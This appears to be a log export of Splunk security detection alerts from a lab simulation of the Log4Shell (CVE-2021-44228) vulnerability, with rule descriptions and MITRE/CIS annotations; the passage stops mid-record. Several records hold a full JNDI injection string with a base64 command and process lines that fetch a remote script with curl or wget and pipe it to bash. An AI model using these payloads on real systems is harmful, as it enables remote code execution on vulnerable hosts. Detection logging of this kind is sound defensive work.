annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640354, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._all="PR.PT", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="PR.DS", annotations._all="T1190", annotations._all="CIS 13", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640352, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them and are especially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was an attempt at an injection, which could be a reconnaissance activity or a valid exploitation attempt, but this does not necessarily mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
